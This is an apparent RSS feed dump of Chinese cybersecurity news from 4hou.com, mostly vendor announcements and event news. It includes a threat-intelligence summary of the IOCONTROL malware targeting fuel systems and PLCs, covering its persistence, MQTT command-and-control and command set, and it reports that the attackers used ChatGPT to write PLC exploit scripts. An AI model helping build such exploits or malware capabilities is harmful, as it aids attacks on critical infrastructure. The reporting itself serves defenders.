[ { "title": "国泰君安联合梆梆安全共研课题荣获证券信息技术研究发展中心结题证书", "link": "https://www.4hou.com/posts/omJL", "description": "

近日，在中国证监会科技监管司的指导下，依据证券信息技术研究发展中心（上海）（简称“ITRDC”）相关制度，证券期货行业网络安全创新实验室近期组织专家完成了2023年度行业共研课题的结题评审，国泰君安联合梆梆安全共研课题《移动应用全生命周期的安全能力建设》荣获ITRDC结题证书。

$\"截屏2025-01-02$

证券期货行业网络安全创新实验室是由中国证监会批准成立、在证券信息技术研究发展中心（上海）下设立的证券行业技术交流平台，致力于推动行业安全前沿科技研究、应用与经验分享。

《移动应用全生命周期的安全能力建设》课题由国泰君安和梆梆安全联合共研，主要针对移动应用全生命周期的四个维度进行研究，包括：

·通过移动应用加固、移动应用安全SDK等技术提升移动应用的基础安全防护能力；

·通过移动应用的动静结合的代码扫描等技术提升移动应用安全检测能力；

·通过针对APP的安全监测以及API的安全监测提升移动应用安全监测能力；

·通过移动安全能力平台的建设提升企业的移动应用安全攻防能力。

针对移动应用基础安全防护方向，移动应用保护技术，创新实现了代码虚拟化保护技术、源到源代码混淆加密技术、汇编指令微虚拟化加密技术、白盒密码技术，为移动应用提供防代码逆向、防动态调试、防恶意篡改、防数据窃取、防密钥泄露等全面的安全保护能力，解决企业在数字化开发过程中的面临的移动应用破解问题。

针对移动应用安全检测方向，APP安全检测旨在对Android-APP、iOS-APP、Android-SDK、公众号、小程序等多平台应用形态通过漏洞特征识别、模拟攻击、成分识别、等检测技术，全方位扫描应用的不良配置、敏感信息泄露、程序代码缺陷、通信传输不安全、安全防护能力不足、恶意代码等问题。精准定位风险，并提供专业的修复建议，在提升安全检测效率同时，保障移动互联网产业链的进一步健康、快速发展。

针对移动应用安全监测方向（基于APP的安全监测），APP安全监测，致力于解决灰产、黑客、违规等业务安全问题，帮助用户建立移动端运行时动态安全监测体系，让管理者对应用发布后的各类攻击、威胁、风险、运营情况做到实时掌控。平台提供应用发布后运行时的安全监控与运行监测服务，对攻击威胁能够做到感知、预警、阻断、溯源，全面提升业务安全防护强度。

针对移动应用安全监测方向（基于API的端到端&全渠道的安全监测），端到端&全渠道的API安全监测综合利用前端检测技术与后端流量分析技术，在API访问端和API服务端之间建立端到端的安全访问机制，降低在设计API之初所遗留的安全风险，并引入零信任理念，建立可信机制，确保前后端访问行为均经安全认证，采用AI/ML技术，针对大量的业务往来和频繁的业务更新以及不断变化的攻击方式，进行动态持续化的检测及自动化防御机制，解决企业在数字化转型下建立的新业务所带来的新型安全风险等问题。

针对移动应用安全攻防方向，移动安全能力平台提供了丰富的移动安全攻防有效的经验方法知识库、解决人员可持续成长需求；基于标准化风险研究，实现自动化检测能力、并提供脱壳、注入、流量代理等工具，解决技术工具缺失问题；场景化的操作流程，为业务实现提供了标准参考，规范化管理。最终，实现“人+经验+工具/技术+流程”的闭环运行，使企业在安全攻防能力和在多重业务场景下的工作效率上形成有效的提升。

本次国泰君安联合梆梆安全共研课题荣获结题证书，体现了行业权威机构对梆梆安全研究能力与技术实力的高度肯定。梆梆安全将认真总结本次课题收获的研究经验，再接再厉，紧紧围绕国家重大战略和金融科技发展方向，积极推进公司在金融移动安全领域的研究能力与落地实施水平，赋能金融行业高质量发展。

", "pubDate": "Fri, 03 Jan 2025 16:23:32 +0800", "author": "梆梆安全" }, { "title": "即刻预约！长亭“WAF+AI”再度跃迁，1月7日语义3.0发布会邀您共启新篇", "link": "https://www.4hou.com/posts/qo8y", "description": "

$\"微信图片_20250103161708.jpg\"/$

", "pubDate": "Fri, 03 Jan 2025 16:21:02 +0800", "author": "企业资讯" }, { "title": "新的 IOCONTROL 恶意软件用于关键基础设施攻击", "link": "https://www.4hou.com/posts/7MVO", "description": "

伊朗恶意分子正在利用名为 IOCONTROL 的新恶意软件来破坏以色列和美国关键基础设施使用的物联网 (IoT) 设备和 OT/SCADA 系统。

目标设备包括路由器、可编程逻辑控制器 (PLC)、人机界面 (HMI)、IP 摄像头、防火墙和燃料管理系统。该恶意软件的模块化特性使其能够危害不同制造商的各种设备，包括 D-Link、Hikvision、Baicells、Red Lion、Orpak、Phoenix Contact、Teltonika 和 Unitronics。

Claroty 的 Team82 研究人员发现了 IOCONTROL 并对其进行了采样进行分析，他们报告说，这是一种民族国家网络武器，可以对关键基础设施造成严重破坏。

鉴于持续的地缘政治冲突，IOCONTROL 目前用于针对以色列和美国的系统，例如 Orpak 和 Gasboy 燃料管理系统。据报道，该工具与一个名为 CyberAv3ngers 的伊朗黑客组织有关，该组织过去曾对攻击工业系统表现出兴趣。

OpenAI 最近还报告称，该威胁组织使用 ChatGPT 来破解 PLC、开发自定义 bash 和 Python 漏洞利用脚本，并计划入侵。

IOCONTROL 攻击

Claroty 从 Gasboy 燃油控制系统中提取了恶意软件样本，特别是该设备的支付终端 (OrPT)，但研究人员并不确切知道黑客是如何用 IOCONTROL 感染它的。

在这些设备内部，IOCONTROL 可以控制泵、支付终端和其他外围系统，从而可能导致中断或数据被盗。

威胁者在 Telegram 上声称破坏了以色列和美国的 200 个加油站，这与 Claroty 的调查结果一致。这些攻击发生在 2023 年末，大约与水处理设施中的 Unitronics Vision PLC/HMI 设备遭到破坏的时间相同，但研究人员报告称，新的攻击活动于 2024 年中期出现。截至 2024 年 12 月 10 日，66 个 VirusTotal 防病毒引擎均未检测到 UPX 打包的恶意软件二进制文件。

$\"gasboy.webp.png\"/$

Gasboy 燃油控制系统是从中提取恶意软件的地方

恶意软件功能

该恶意软件以“iocontrol”名称存储在“/usr/bin/”目录中，使用模块化配置来适应不同的供应商和设备类型，针对广泛的系统架构。它使用持久性脚本（“S93InitSystemd.sh”）在系统启动时执行恶意软件进程（“iocontrol”），因此重新启动设备不会将其停用。

它通过端口 8883 使用 MQTT 协议与其命令和控制 (C2) 服务器进行通信，这是物联网设备的标准通道和协议。唯一的设备 ID 嵌入到 MQTT 凭证中，以实现更好的控制。

DNS over HTTPS (DoH) 用于解析 C2 域，同时规避网络流量监控工具，并且恶意软件的配置使用 AES-256-CBC 进行加密。

IOCONTROL 支持的命令如下：

·发送“hello”：向C2报告详细的系统信息（例如主机名、当前用户、设备型号）。

·检查执行：确认恶意软件二进制文件已正确安装且可执行。

·执行命令：通过系统调用运行任意操作系统命令并报告输出。

·自删除：删除自己的二进制文件、脚本和日志以逃避检测。

·端口扫描：扫描指定的 IP 范围和端口以识别其他潜在目标。

上述命令是使用从“libc”库动态检索的系统调用执行的，并将输出写入临时文件以进行报告。

$\"flow.webp.png\"/$

简化的攻击流程

鉴于 IOCONTROL 目标在关键基础设施中的作用以及该组织的持续活动，Claroty 的报告为防御者提供了宝贵的资源，可以帮助他们识别和阻止威胁。

", "pubDate": "Thu, 02 Jan 2025 12:00:00 +0800", "author": "胡金鱼" }, { "title": "【附下载】数据目录编制/管理全家桶：案例、模板、规范/指南等", "link": "https://www.4hou.com/posts/l061", "description": "

本期要点

16+ 不同领域
30+ 标准
8+ 地方规章
1+ 思维导图

涵盖：

数据目录管理要求/办法/制度
数据目录编制案例/实例/成果
数据目录体系
数据目录体系规范
数据目录设计规范
数据目录编制规范/指南
数据目录申报指南
数据目录报送/编制模板/样例
数据共享责任清单等

相关资料获取

请文末评论留言

(特别说明：本文资料仅供参考，最终请以官方最新版本为准)

思维导图

$\"数据目录$

（点击可放大查看）

数据目录管理要求/办法/制度

（节选示例）

$\"image1.png\"/$

数据目录编制案例/实例/成果

（节选示例）

数据分类分级、制定重要数据目录试点成果分享—优秀案例：

$\"image2.png\"/$

数据目录体系

（节选示例）

JT∕T 747.1-2020 交通运输信息资源目录体系第1部分_总体架构

$\"image3.png\"/$

$\"image4.png\"/$

$\"image5.png\"/$

$\"image6.png\"/$

数据目录体系规范

（节选示例）

DB11∕T 337-2021 政务数据资源目录体系规范（北京市）

$\"image7.png\"/$

数据目录设计规范

（节选示例）

T∕XAZN XXX—XXXX 智能交通行业数据资源目录设计规范

$\"image8.png\"/$

数据目录编制规范指南

（节选示例）

DB33∕T 1354.2-2024 产业数据仓第2部分：数据资源编目规范（浙江省）

$\"image9.png\"/$

$\"image10.png\"/$

$\"image11.png\"/$

数据目录申报指南

（节选示例）

中国（天津）自由贸易试验区企业重要数据目录申报指南

$\"image12.png\"/$

数据目录报送/编制模板/样例

（节选示例）

T∕BFIA 020-2023 金融数据资源目录编制指南

$\"image13.png\"/$

T∕GDWJ 024—2024 健康医疗信息重要数据识别和管理指南

$\"image14.png\"/$

数据共享责任清单

（节选示例）

湖北省省级数据共享责任清单

$\"WechatIMG146.jpg\"/$

来源：重庆信通设计院天空实验室

", "pubDate": "Thu, 02 Jan 2025 11:03:15 +0800", "author": "网络伍豪" }, { "title": "技能盛宴，荣耀收官 | 2024年江苏省第六届大学生网络空间安全知识技能大赛圆满落幕", "link": "https://www.4hou.com/posts/jBJ4", "description": "

为进一步宣传贯彻《网络安全法》，加速网络安全人才的培养和发展，推动网络安全技术的研究和应用，加强我国网络安全意识和防范能力。2024年江苏省第六届大学生网络空间安全知识技能大赛，12月28日于江苏安全技术职业学院云龙校区举办。

博智安全科技股份有限公司（以下简称“博智安全”）作为本次大赛协办和唯一技术支持单位，将为大赛赛事运营保障、综合流程把控、现场技术支撑等多方面提供全流程支持，充分发挥博智安全在赛事运营与综合实践中积累的丰富经验，有效助力实战环境下高效遂行能源网络安全防护提供有力支撑及人才保障。

$\"图片$

比赛环节

本次竞赛包含夺旗解题、渗透测试、应急溯源、安全故障恢复等典型业务场景安全分析模块，各参赛选手依据竞赛模式通过给定赛题进行通过离线分析或在线交互的方式进行解题。

$\"图片$

博智安全依托博智孪生仿真靶场，通过构建虚实结合的网络安全环境，提供集教、学、练、赛于一体，基于数字孪生技术，将虚拟网络环境与真实物理环境，以即插即用的方式无障碍连通，实现虚拟与真实融合。通过理论赛、解题赛、闯关赛、攻防赛等多种模式，提供全方位贴近实战的竞赛场景，满足各行业网络安全人才培养及选拔、网络安全大赛平台搭建以及实战对抗演练的需求，锤炼人员实战能力，是网络安全以赛备战的练兵场。

$\"图片$

闭幕式

江苏省计算机学会副理事长、中国矿业大学计算机科学与技术学院院长周勇教授和江苏安全技术职业学院校长李桂萍教授在闭幕式上致辞。江苏省计算机学会信息安全专委会主任、南京信息工程大学计算机学院院长付章杰教授，江苏省计算机学会信息安全专委会秘书长、江苏师范大学计算机科学与技术学院刘亚丽教授，博智安全副总裁王路路等专家出席闭幕式，并为获奖队伍颁奖。

$\"4.png\"/$

$\"5.png\"/$

$\"6.png\"/$

博智安全积极推进“网络强国”战略

本次大赛进一步宣传贯彻了《网络安全法》，落实中央网信办、教育部等部门印发的《关于加强网络安全学科建设和人才培养的意见》精神，在实战过程中培养大学生的创新精神和实践能力，形成学会主办、各行业部门深度参与的优秀网络安全人才培养、发现、选拔良性机制，加速网络安全人才的培养和发展，推动网络安全技术的研究和应用，加强我国网络安全意识和防范能力，促进网络安全事业健康、科学、有序发展。

$\"7.png\"/$

多年来，博智安全高度重视网络安全人才培养。网络安全就是国家安全，培养高素质网络安全人才是根基所在，作为专业网络靶场提供商，博智孪生仿真靶场拥有领先的技术优势及网络安全竞赛服务经验。博智安全将牢记使命，充分发挥自身技术优势，助力政府、高校、产业界培养攻防兼备的网络安全人才，为“网络强国”战略持续供能。

", "pubDate": "Tue, 31 Dec 2024 14:34:00 +0800", "author": "企业资讯" }, { "title": "局长办公室、部队总司令陆续遭窃听，一再拉垮的乌克兰安全部门", "link": "https://www.4hou.com/posts/RXM0", "description": "

讲战争走向和无人机对抗之类的文章太多了，本文也不扯什么意识形态的东西，我们换个角度，就单从一个国家安全部门的专属职能之一：反窃密安全检测能力上，讲几件事，权当笑话听吧。

$\"1.jpg\"$

声明：以下内容来源符合OSINT国际开源情报搜集标准，不涉及任何非法行为，部分取自RC2全球威胁情报库，仅供交流与参考。

0x01 乌克兰调查局局长办公室

2019年，发现窃听器材

这是第一次丢脸。

2019年，在国外TSCM技术圈，突然爆出了一个消息，某商业物理安全检测团队，在应邀对乌克兰调查局局长办公室开展专业安全检测时，竟然真的在墙壁里查出了窃听器材。

从下图上看，该器材能够部署在墙壁里，且传输线路一直紧贴砖缝，这显然并不是临时行为，应该是由专业人士在最近一次装修，或者改建初期就直接部署的。

$\"2.png\"/$

★小知识：

SBI，The State Bureau of Investigation，即乌克兰国家调查局，乌克兰语：Державне Бюро Розслідувань，是乌克兰的重要执法机构，负责调查涉及执法人员、法官和高级官员的刑事诉讼。作为乌克兰的强势部门之一，曾发布对已逃离乌克兰的前司法部长和前外交部长的红色通缉。

下图是位于乌克兰基辅的SBI总部大楼。

$\"3.jpg\"/$

发现窃听器这件事的曝光，一方面展示了该商业TSCM团队的专业性，另一方面则赤果果地暴露出乌克兰安全部门在反间谍检测方面的能力不足。

嘿嘿，一位重要部门的局长办公室，居然被安放了窃听器材，且多年来从未被发现，直到被一个商业团队检测出。可想而知，莫非局内部安全保卫部门都是一群浆糊，还是说自身反间谍检测能力实在差的离谱？

这件事造成的不良影响可不仅仅是发现器材这件事本身，更关键的是，这是由一家民营TSCM商业检测公司的技术团队发现的。对于乌克兰国家安全机构来说，这就已经不是耻辱，已经升级到羞辱级别了

0x02 乌克兰武装部队总司令办公室

2023年，发现窃听器材

谁也没想到，没隔几年，就来了第二次打脸。

据相关栏目报道称，2023年12月17日，乌克兰武装部队总司令瓦列里·扎卢日内的办公室发现了窃听装置。

$\"4.jpg\"$

该窃听器可能是在总司令的新办公室中发现的，在他搬迁之前对该办公室进行了检查。

几个小时后，乌克兰安全部门SBU发表了声明。SBU部门强调，该“窃听器”不是安装在总司令的办公室，而是安装在“乌克兰武装部队总司令的潜在办公地之一”。换句话说，这个房间只是为了让军事领导人可以在里面工作而准备的。

至于窃听器材本身，安全部门的某位负责人指出，这是“一种过时的器材，早在[前总统维克托]亚努科维奇时代就被乌克兰部门使用过。”

“根据初步判断，该器材已无法运行。尚未确定存储信息的方法或远程传输录音的方法。该窃听器材已提交专业部门检查。”SBU 声称。

杨叔：What？这位前总统 维克托亚努科维奇 不是自2014年逃亡俄罗斯后，就被乌克兰政府通缉了吗？怎么人家离开后，安全部门没有及时对关键内部办公场所做彻底的反窃密检测吗？

★小知识：

SSU，The Security Service of Ukraine，即乌克兰国家安全局，是该国的主要情报、执法和安全机构。注意：它也通常被称为 SBU，这是从乌克兰语西里尔文音译而来的缩写。

下图是SBU的网络安全情报中心。

$\"5.jpg\"/$

但有趣的是，几乎同时，军事分析家兼《审查网》杂志主编尤里·布图索夫发布说：发现了不止一个“窃听器”，其中一个在扎卢日尼的办公桌下，另一个在他的助手康斯坦丁·布修耶夫的办公室里。

乌克兰武装部队总参谋部也证实发现了两个窃听器，并在随后一份声明中表示：“在乌克兰武装部队总司令和支持其活动的机构雇员的办公室内发现了窃听器材。”

乌克兰军方的瓦列里·康德拉图克将军甚至指出：“可以立法仅授予两个部门在政府官员办公室安装窃听设备的权利：乌克兰安全局和国家反腐败局。但要执行此类程序行动，他们必须获得法院批准。”

“但无论如何，像这次“窃听器”被非法安装在总司令办公室里的情况，就是乌克兰军事反情报部门的严重失职，他们本应能阻止此类事件的发生。”

据西方媒体报道，过去几个月，许多观察家和记者报道了总统弗拉基米尔·泽连斯基和瓦列里·扎卢日尼之间的严重冲突。据称总统对扎卢日尼的受欢迎程度和他的采访感到恼火，他在采访中宣布前线陷入僵局并过渡到堑壕战。

放个图，可以看看双方的表情，都是一脸凝重

$\"6.png\"$

当然，乌克兰政府代表立刻否认了：别瞎说啊，没有的事。

0x03 乌克兰安全局监控调查记者

2024年，监视记者被发现

2024年1月，乌克兰首都发生多起恐吓乌克兰调查记者的事件，这导致总部位于巴黎的新闻自由组织无国界记者组织 (RSF) 呼吁当局调查涉嫌违规行为。

RSF 列出了三起在一周内发生或曝光的案件：

• 案件一：专门调查腐败的媒体 Bihus.info 的工作人员从 1 月 16 日发布在社交媒体上的一段视频中发现，他们几个月来一直遭到秘密拍摄和窃听

• 案件二：涉及驻敖德萨的调查记者 Iryna Hryb，她报道了该地区的粮食出口情况，并在车里发现了多个监听装置，可以用来监听她的电话或与乘客的对话，并追踪她的行踪。

• 案件三：涉及反腐媒体 Nashy Hroshy 的调查记者 Yuriy Nikolov。1 月 14 日，有蒙面人试图强行闯入他在基辅的公寓，同时威胁要强行征召他加入乌克兰军队，抵抗俄罗斯入侵。

在案件一里，涉及的隐藏摄像头拍摄的 Bihus.info 记者的不雅照片和录音被发布在社交媒体上后，该网站的主编发誓他的团队将展开调查，找出责任人。

三周后，在 2 月 5 日发布的一份冗长的视频调查中，丹尼斯·比胡斯主编指责乌克兰安全局 (SBU) 是监视其团队的幕后黑手。

据SBU的一名消息人士告诉法新社，“由于 Bihus Info 员工遭到监视，乌克兰安全局国家保护部负责人罗曼·谢缅琴科被撤职，他被指控在酒店大楼现场动员了大约 30 名特工，在几个房间里隐藏摄像头。这一撤职决定是由乌克兰安全局局长做出的，并得到了总统泽连斯基的批准。”

杨叔：动作这么大，真夸张，不知道的还以为在拍乌克兰版“伯恩的身份”~

而案件二里，调查记者 Iryna Hryb发布了大量车内高清图片，如下图所示，可以清晰地看到多个定位监听器材：

$\"7.jpg\"$

$\"8.jpg\"$

记者Iryna Hryb认为，监视行为应该与她完成的敖德萨州粮食走廊的报告有关，据她称，该报告涉及敖德萨州军事管理局、经济安全局、敖德萨海关办公室和税务局。

愤怒的美女调查记者同时表示：“在一个处于战争状态的国家，执法部门却在恐吓和迫害记者和博主，这真是一种耻辱。”

哈哈，乌克兰安全局在反间谍方面的能力还有待商榷，但是在对内的技术监视方面，那倒是挥洒自如不遗余力。

杨叔：不过就是这些监视定位的器材吧，怎么感觉有点华强北的风格咩？作为国家安全局的SBU不应该啊？莫非现在经费不足把干活都外包了？

0x04 小结

Talk About Nothing

还有些资料，就不一一解读了。

总之，在最近几年的相关案例中，乌克兰多个安全部门，特别是反间谍反情报部门、安全技术检测部门和技术侦查部门的表现，也算是教科书式丢脸了~

", "pubDate": "Tue, 31 Dec 2024 11:33:58 +0800", "author": "RC2反窃密实验室" }, { "title": "摇滚&黑客演唱会回归 1月11日北京不见不散！", "link": "https://www.4hou.com/posts/gyXj", "description": "

来自网络安全媒体“安全419”的官方消息——沉寂多年的“摇滚&黑客”项目在近期重新启动，全新的“摇滚黑客2025演唱会”将在2025年1月11日在北京开唱。这标志着曾经在网络安全行业火爆一时的“摇滚&黑客”跨界文化项目正式回归。全新的“摇滚黑客2025演唱会”将延续一如既往的“摇滚”和“黑客”元素，继续担任起传播推广网络安全文化的重任。

$\"图片1.png\"/$

“摇滚&黑客”项目是由安全419团队及一帮热爱音乐的网络安全产业人士共同发起的一个“音乐圈&网络安全圈”跨界文化公益项目，旨在通过以演出的形式推广网络安全文化，提升民众对网络安全的关注度，培养所有公民的网络安全意识。作为网络安全产业从业者，“摇滚&黑客”项目发起者希望通过举办演唱会这样大众喜闻乐见的形式，向社会传递网络安全行业正能量，通过引发民众对网络安全行业的关注，进一步提升民众对网络安全的认知。

同时，项目发起者认为“摇滚精神”和“黑客精神”，也一直被大众所误解——民间普遍认为“摇滚”就是离经叛道，实际“摇滚精神”同样可以正能量，给予大众激励的作用；而普遍认为的“黑客”其实也并非在网络上作恶之徒，真正的“黑客”实际上是一种勇于挑战突破极限具备“极客精神”的正义之士的注解（行业普遍定义在网络上作恶的被称为“骇客”或者“黑帽子”，而正义黑客则被称为“白帽子”）。

“摇滚&黑客”项目最大的意义在于通过网络安全与摇滚的跨界碰撞，将真正的黑客精神和真实的网络安全产业展现在世人面前，推动网安事业的发展。项目自发起以来，就受到了业界高度关注，众多知名网安企业参与到该项目的众筹中来。而“摇滚黑客2025演唱会”同样来自包括网安产业投资者：密码资本、元起资本、格尔软件、360漏洞云、HackingClub、边界无限、航天启星、和人广智、华鸿信安、熠数信息、无糖信息、云起无垠、丈八网安等众多优秀网安企业的共同协办。不仅如此，此次演唱会将由主办方精心挑选的三组优秀的艺人——“伏蒿”、“张荡荡”和“霓虹之下”负责演出的部分，为大家带来一场充满激情的狂欢盛宴。同时，这恐怕也是2025年国内“正义黑客”最大规模的一次狂欢聚会！

$\"图片2.png\"/$

摇滚精神不死，网安创业不息——我们同样希望“摇滚黑客2025演唱会”能通过它特有的表达方式，激励所有正在创业路上的所有网络安全行业从业者们。在1月11日这个一年中最寒冷的“四九天”，给所有人带来温暖和向上的力量！

2025年1月11日，20:00pm，北京·福浪LIVEHOUSE，我们不见不散！

", "pubDate": "Tue, 31 Dec 2024 09:55:18 +0800", "author": "企业资讯" }, { "title": "梆梆安全全渠道应用安全解决方案", "link": "https://www.4hou.com/posts/qo8k", "description": "

随着数字化转型的深入发展，企业广泛采用API来连接各类应用与后端服务，导致API数量激增，成为企业的核心数字资产和信息基础设施。然而，现有产品/解决方案在API安全方面存在短板，数据安全问题日益突出。

梆梆安全全渠道应用安全解决方案旨在解决API运行时安全，通过加强API安全结合端侧安全，提升企业业务安全性，推动行业在微服务架构下的健康发展，为数字化应用提供可靠的数据交换保障，从而带来更安全、高效的应用。

一. 标签

全渠道应用 API安全应用安全监测端到端安全解决方案

二. 用户痛点

1. 渠道多样性带来安全挑战

随着企业不断拓展与客户的互动渠道，包括官方网站、移动应用、小程序，以及H5页面等，多样化“接触点”在提升用户体验的同时，也使得安全防护面临更为复杂的挑战。每一个渠道都有可能成为攻击者发起攻击的突破口，从而增加了企业安全防护难度。

2. 安全策略不一致

企业在通过多样化的互动渠道与客户连接时，需要在各个平台采用不同的安全措施和标准，这种差异化可能导致整体安全策略的不一致性，从而增加安全漏洞出现的风险。

3. 跨渠道攻击

攻击者可能利用不同渠道之间的交互漏洞，发起跨渠道的协同攻击，这种策略性的入侵使得企业的防御措施面临更为严峻的考验，大大增加了安全防护的难度。

4. 用户身份验证和授权

在多渠道运营背景下，维护用户身份真实性和授权正确性构成了一项重大挑战，特别是在应对诸如钓鱼攻击、社交工程等复杂威胁时，这一挑战显得尤为突出。

5. 安全事件响应

在多渠道运营架构下，应对安全事件需跨部门、跨团队的协同作业，这一流程可能造成响应延迟，进而加剧潜在的损害风险。

6. 技术兼容性和集成

鉴于不同渠道往往采用不同的技术栈，企业安全解决方案必须具备跨技术栈的兼容性及集成能力，以确保全面而有效的防护。

7. 用户体验与安全建设的平衡

在加固安全防线的过程中，企业还需平衡业务的稳定可运营，以确保用户体验不受干扰。

三. 产品或解决方案

在移动互联网和物联网技术飞速发展的背景下，多渠道应用安全威胁的市场环境愈发错综复杂。企业为提升用户体验和扩大业务范围，不断拓宽线上应用渠道，然而这也带来了应用层面的安全风险激增。黑客利用跨平台漏洞、API接口安全缺陷、移动设备漏洞等途径发动攻击，导致数据泄露、服务中断、品牌声誉受损事件频发。面对这一现状，市场对能有效应对多渠道应用安全挑战的解决方案需求激增，企业亟需加强应用安全防护，确保用户权益和业务稳定运行。

梆梆安全全渠道应用安全监测通过在访问终端应用集成SDK/JS-SDK探针，同时接入服务端的访问流量，或接入业务访问日志，结合威胁情报等数据进行业务风险综合关联分析，综合利用流式、批式计算技术及机器学习技术，提供客户端风险发现、API攻击发现、端到端联动风险分析及发现，支持与网关或风控系统联动，进行实时风险处置，并支持客户端直接处置，协助客户解决API上线运行后所面临的各种安全风险。

$\"截屏2024-12-30$

产品总体技术框架

核心能力

（1）风险检测能力

·客户端环境风险检测

利用自主研发的SDK与JS探针，针对H5轻应用和APP应用（包括Android、iOS、鸿蒙NEXT）进行全面的异常监测与管控。检测内容包括：客户端异常运行环境，如钓鱼网站和自动化工具；异常行为，如机器人访问和客户端调试。实时监测APP运行时的攻击行为，并支持定位溯源攻击者及其手段。同时动态监控APP内部Webview的流量访问，有效发现并管控违规外链域名/IP和内容信息。

·流量风险检测

通过自主研发的离线统计分析引擎和流量检测引擎，能够有效检测网络中的异常行为，包括高频/低频访问、异常大量访问、非工作时间访问、非可信终端和地域访问等，同时支持识别API的脆弱性，如鉴权认证失效、权限和参数未经验证、请求和访问路径异常等，并能检测攻击者利用授权管理和业务逻辑漏洞进行的攻击，如横向越权、越权绕过、薅羊毛、刷单、占库存、抢票等行为。

·机器学习模型检测

利用自主研发的机器学习模型检测引擎，通过机器学习算法进行一段时间的学习可自动形成风险检测基线，如设备指纹基线、渠道访问基线、访问序列基线。

·关联风险事件检测

可对APP风险、轻应用风险、流量风险进行端到端关联分析，并生成准实时风险事件。将前端风险感知与后端流量感知相结合，实现端到端的安全协同。

·风险IP监测

可对接IP情报库，实时监测IP并生成对应风险IP的风险类别，可识别代理IP、秒拨IP、暴力破解IP等多种风险IP类别。支持在线、离线方式更新情报库。

（2）安全处置能力

·输出风险标签

支持将识别出的风险实时同步给第三方系统，由第三方系统采用风险标签并可结合其他维度判断后进行处置。

·重定向

可以设置将访问请求地址重定向至指定地址，有效防止重复提交数据。支持配置重定向地址。

·流量阻断

通过串接部署，平台可直接阻断不法请求、恶意请求、访问越界等行为。

·客户端阻断

通过APP中的SDK，可支持对运行中的APP实现强制退出、弹窗提醒后强制退出、弹窗提醒等处置动作。

·多维度阻断

可针对攻击源设备、IP、用户进行定向处置，阻断其请求行为。

四、典型应用场景

航空、客运、铁路、演出和电商等行业票务系统长期遭受第三方平台和黄牛党的刷票行为，这不仅导致服务器资源的大量浪费，还存在时效性订单被攻击者利用时间差抢占却未支付的风险。这种行为使得正常消费者难以成功购票，严重影响了用户的体验，并且给商家造成了巨大的经济损失。

解决方案

·渗透嗅探攻击发现：通过SDK实现传输报文签名，在API平台监控报文中间人劫持篡改、重放、报文时间异常等情况，同时关注访问设备环境风险情况，以免形成攻击链；

·批量刷接口监测：通过报文篡改监测，同时针对IP、设备、用户等维度进行统计分析，发现某些访问源持续只访问个别接口，访问目标分布不合理；

·越权漏洞发现：经过客户协调，获取内层对称加密的解密密钥，对于传输消息体（body）进行解密。通过配置越权漏洞检测模型相关参数，发现未授权API接口访问及横向越权疑似漏洞API接口。

五、典型用户及应用价值

1. 某金融客户存在越权漏洞案例

在某金融客户内部攻防演练中，红队渗透测试时发现其生产系统某API接口存在越权漏洞，可批量遍历数据。作为应急措施，相关部门迅速对相应业务实施下线处理，但尚不清楚是否有数据被非法窃取。此前尽管新业务在上线前均进行安全测试，由于业务时间紧迫，此次测试未能及时发现该漏洞，同时业务风险控制及其他安全措施也未能识别出该安全问题。

客户期望

通过实施端到端的API安全监测解决方案，实现对互联网侧API业务访问的实时监测与分析，有效保障数据安全：

1.能够在黑灰产渗透嗅探阶段，提前发现攻击；

2.针对攻击者对漏洞的利用要及时发现，防止大量数据的外泄，同时能够支持溯源评估；

3.通过流量期望进行可能的越权漏洞检测。

解决思路

1.渗透嗅探攻击发现：通过SDK实现传输报文签名，在API平台监控报文中间人劫持篡改、重放、报文时间异常，同时关注访问设备环境风险情况，形成攻击链；

2.批量刷接口监测：通过报文篡改监测，同时针对IP、设备、用户等维度进行统计分析，发现某些访问源只持续访问个别接口，访问目标分布不合理；

3.越权漏洞发现：经过客户协调，获取内层对称加密的解密密钥，对于传输body进行解密，通过配置越权漏洞检测模型相关参数，发现未授权API接口访问及横向越权疑似漏洞API接口。

2. 某电商客户被洗钱案例

来自互联网电商、金融及运营商电商部门的客户反馈，接到来自12315消费者投诉热线或当地市政服务热线12123询问，涉及用户投诉遭遇诈骗，并最终追溯到他们。经过调查发现，这些诈骗事件的操作手法为灰产从业者破解充值/购买商品协议，生成虚假订单引导受害者付款，再通过二次销售手段洗钱变现。在国家对电信诈骗的严厉打击下，灰产难以获取银行卡直接实施诈骗，因此转向利用电商和充值业务作为洗钱的新途径。

客户期望

保障电子渠道业务都来自于自身的合法渠道，尽管这些涉洗钱活动并未直接导致资金损失，但它们可能引发负面舆论和政治影响，同时面临监管压力：

1.提升破解逆向分析的门槛；

2.及时发现自动登录、自动下单等，事中阻止。

解决思路

客户端使用梆梆安全最新加固保护，提升代码逆向及破解。通过接入API安全平台，分析所有API请求调用的客户端环境特征信息，确认其是否来自于官方渠道。同时对IP、设备、用户几个维度进行行为聚类分析，以发现异常下单情况。对接网关或业务风控系统，支持事中处置。

3. 某市政府APP被外链案例

某学生家长向记者反映称，通过当地政务服务APP查询学生入学登记信息时，点击“xx主题教育平台”栏目便突然跳转到色情网站。当日下午，记者查询发现该APP中“xx主题教育平台”子栏目已下架。负责运维该应用程序的公司迅速作出回应，表示在上午发现客户端连接到某某数字出版集团有限公司备案的网站出现异常情况，基于网站可能遭受篡改的疑虑，即刻采取行动删除相关链接。

客户期望

希望构建针对APP外链H5违规信息的监测能力，重点聚焦于外部链接内容违规问题，同时能够覆盖外链异常域名场景。

1.仅允许授权范围内的地址加载展示；

2.发现展示内容中的违禁内容；

3.针对前端异常加载内容进行同步/异步多样化处置，支持禁止加载或弹窗提醒。

解决思路

采用梆梆全渠道应用安全监测平台，在前端植入安全SDK。该SDK通过APP初始化后，会动态监控APP内部的流量访问行为。通过同步/异步分析的模式，针对APP内的H5外链访问情况进行动态监控/管控。支持构建白名单机制，仅允许授权内的域名/IP进行应用进行加载访问；支持对加载内容进行动态检查，及时发现违规内容展示，对风险情况及时上报后端平台进行预警展示。

六、用户反馈

自从我行采用梆梆安全全渠道应用安全监测，移动应用安全性得到显著提升。该产品全面覆盖了我们Web端、移动端及API接口等多个渠道，有效识别并防御各类安全威胁，保障数据的安全和业务的稳定运行。特别是在面对复杂网络环境和不断升级的攻击手段时，该产品表现出了极高的专业性和可靠性，通过实时监测和预警，快速识别并应对潜在的安全风险，大大降低了安全事件的发生概率。

——某金融行业客户

